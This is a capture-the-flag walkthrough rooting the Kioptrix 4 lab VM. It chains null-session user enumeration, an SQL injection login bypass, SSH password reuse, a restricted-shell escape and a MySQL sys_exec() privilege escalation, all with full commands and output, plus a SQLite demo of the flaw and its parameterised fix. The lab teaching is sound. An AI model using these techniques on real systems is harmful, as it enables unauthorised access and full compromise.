Overview
Kioptrix 4 is a boot-to-root (B2R) VM designed for students to practice vulnerability analysis and exploitation. The objective is to root the virtual machine by chaining the vulnerabilities it exposes, ending in full system compromise.
Vulnerabilities Exploited:
- SQL injection in the website login (the password field is passed to the query unescaped)
- Website user password reused for SSH
- Web application connects to MySQL as root with an empty password
- Operating system commands available from inside MySQL through the lib_mysqludf_sys.so UDF (sys_exec)
Lab Setup:
- VMware Workstation for the virtual machines
- Kali Linux VM in bridged mode
- Kioptrix 4 in bridged mode
Tools Used:
- Kali Linux VM
- netdiscover
- nmap
- enum4linux
Reconnaissance/Scanning
#netdiscover
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.8.100   84:3a:4b:5c:f5:54      1      60  Intel Corporate
 192.168.8.108   00:0c:29:89:0d:50      1      60  VMware, Inc.
 192.168.8.1     14:a5:1a:c3:5a:cc     14     840  HUAWEI TECHNOLOGIES CO.,LTD
Target VM IP Address: 192.168.8.108
Let's scan the target box with nmap over the full TCP port range to find open ports and the services listening on them.
root@kali:~# nmap -p- -A 192.168.8.108
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-30 07:57 EDT
Nmap scan report for 192.168.8.108
Host is up (0.00035s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:89:0D:50 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 6h59m58s, deviation: 2h49m43s, median: 4h59m57s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-05-30T12:58:29-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT      ADDRESS
1   0.35 ms  192.168.8.108

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds
Nmap Findings:
- The target is a Linux (Ubuntu) machine running a 2.6 kernel
- SSH on port 22 (OpenSSH 4.7p1)
- Website on port 80 (Apache 2.2.8 with PHP 5.2.4)
- Samba 3.0.28a on ports 139 and 445, with guest access and SMB signing disabled
The website login form is vulnerable to SQL injection. Entering the username admin with the payload below in the password field bypasses authentication, but there is no member page for an account called "admin", so the login leads nowhere useful:
admin:garbag' or 1=1 -- -
So we need to enumerate real user accounts first. Samba accepts a null session, so let's use enum4linux.
root@kali:~# enum4linux 192.168.8.108
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 30 08:12:46 2018

 ==========================
|    Target Information    |
 ==========================
Target ........... 192.168.8.108
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 =====================================================
|    Enumerating Workgroup/Domain on 192.168.8.108    |
 =====================================================
[+] Got domain/workgroup name: WORKGROUP

 =============================================
|    Nbtstat Information for 192.168.8.108    |
 =============================================
Looking up status of 192.168.8.108
	KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
	KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
	KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

	MAC Address = 00-00-00-00-00-00

 ======================================
|    Session Check on 192.168.8.108    |
 ======================================
[+] Server 192.168.8.108 allows sessions using username '', password ''

 ============================================
|    Getting domain SID for 192.168.8.108    |
 ============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 =======================================
|    OS information on 192.168.8.108    |
 =======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.8.108 from smbclient:
[+] Got OS info for 192.168.8.108 from srvinfo:
	KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	4.9
	server type     :	0x809a03

 ==============================
|    Users on 192.168.8.108    |
 ==============================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert	Name: ,,,	Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root	Name: root	Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john	Name: ,,,	Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret	Name: loneferret,,,	Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
...
Three regular user accounts were found over the null session: john, robert and loneferret.
Exploitation
Let's bypass authentication again, this time with the username john and the same payload in the password field. The query still matches because of AND/OR precedence (username='john' AND password='garbag' OR 1=1 is true for every row), and the application then redirects to john's member page, which reveals his password:
john:garbag' or 1=1 -- -
Let's try to reuse john's website password over SSH.
root@kali:~# ssh john@192.168.8.108
The authenticity of host '192.168.8.108 (192.168.8.108)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.8.108' (RSA) to the list of known hosts.
john@192.168.8.108's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ python -c "import pty; pty.spawn('/bin/bash');"
*** forbidden syntax -> "python -c "import pty; pty.spawn('/bin/bash');""
*** You have 0 warning(s) left, before getting kicked out. This incident has been reported.
john:~$
The password is reused, but we land in a restricted shell: the "forbidden syntax" message and the warning counter are characteristic of lshell, a Python-based restricted shell, and a single disallowed command leaves us with zero warnings before being kicked out.
Let's break out of the restriction with a known lshell escape: echo os.system("/bin/bash")
john:~$ echo os.system("/bin/bash")
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=115(admin),1001(john)
john@Kioptrix4:~$
Privilege Escalation
Our next step is to root the machine. Let's search for the MySQL UDF library lib_mysqludf_sys, which provides functions such as sys_exec() for running operating system commands from inside MySQL. Such commands run with the privileges of the mysqld process, so if MySQL runs as root they run as root.
john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
john@Kioptrix4:~$
The database credentials are found in /var/www/checklogin.php, the script that handles the login form:
john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];

// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);

//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}

ob_end_flush();
?>
The database credentials are user "root" with an empty password. The script also explains the injection: only $myusername goes through mysql_real_escape_string, while the call for $mypassword is commented out, so the password is concatenated into the query verbatim, and any non-zero row count counts as a successful login.
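To make the injection concrete, here is an added example (not code from the original page or from the Kioptrix VM) that models the checklogin.php query in SQLite. The members table and the passwords in it are constructed sample data; the real table layout is not shown on the page. It shows why the payload matches rows even though the username is escaped, why the "admin" attempt succeeds yet leads nowhere (no such row, but the redirect still uses the supplied username), and how a parameterised query stops it.

```python
import sqlite3

# Constructed sample data standing in for the Kioptrix 4 "members" table
# (assumption: two columns, username and password; values are made up).
SAMPLE_MEMBERS = [
    ("john", "secret1"),
    ("robert", "secret2"),
]

# The payload used in the write-up: closes the password string, ORs in a
# tautology, and comments out the trailing quote the application appends.
PAYLOAD = "garbag' or 1=1 -- -"


def make_db():
    """In-memory SQLite database with the constructed members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_MEMBERS)
    return conn


def vulnerable_login(conn, username, password):
    """Mirror checklogin.php: username escaped, password pasted in raw.

    Returns (query_text, matched_usernames). A non-empty list corresponds to
    mysql_num_rows() != 0, i.e. the application treats it as a valid login.
    """
    # Stand-in for mysql_real_escape_string (SQLite doubles single quotes).
    safe_user = username.replace("'", "''")
    sql = (f"SELECT username FROM members WHERE username='{safe_user}' "
           f"and password='{password}'")
    rows = conn.execute(sql).fetchall()
    # AND binds tighter than OR, so the WHERE clause becomes
    # (username=... AND password='garbag') OR 1=1, which is true for every row.
    return sql, sorted(r[0] for r in rows)


def hardened_login(conn, username, password):
    """Parameterised version: the payload is data, never SQL text."""
    rows = conn.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return sorted(r[0] for r in rows)


if __name__ == "__main__":
    db = make_db()
    q, matched = vulnerable_login(db, "john", PAYLOAD)
    print("vulnerable query:", q)
    print("vulnerable matched:", matched)
    # "admin" also gets a non-zero row count, but login_success.php is then
    # called with username=admin, for which no member page exists.
    print("vulnerable as admin:", vulnerable_login(db, "admin", PAYLOAD)[1])
    print("hardened with payload:", hardened_login(db, "john", PAYLOAD))
    print("hardened with real password:", hardened_login(db, "john", "secret1"))
```

Run it stand-alone to see the exact query string that reaches the database; the only change needed in the PHP would be to bind both values as parameters rather than escaping one and forgetting the other.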
Let's log into MySQL as root and call sys_exec() to add john to the admin group, which on Ubuntu of this era is granted full sudo rights through /etc/sudoers (%admin ALL=(ALL) ALL). The command succeeds only because mysqld itself runs as root; sys_exec() returns NULL regardless, so the effect has to be confirmed separately.
john@Kioptrix4:/var/www$ mysql -u root@localhost -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 28
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 |
+--------------------------------------+
1 row in set (0.01 sec)

mysql> exit
Bye
Let's confirm root access with sudo, authenticating with john's own password.
john@Kioptrix4:/var/www$ sudo su
[sudo] password for john:
root@Kioptrix4:/var/www# whoami
root
root@Kioptrix4:/var/www# id
uid=0(root) gid=0(root) groups=0(root)
roooooooooootz:)
References
https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html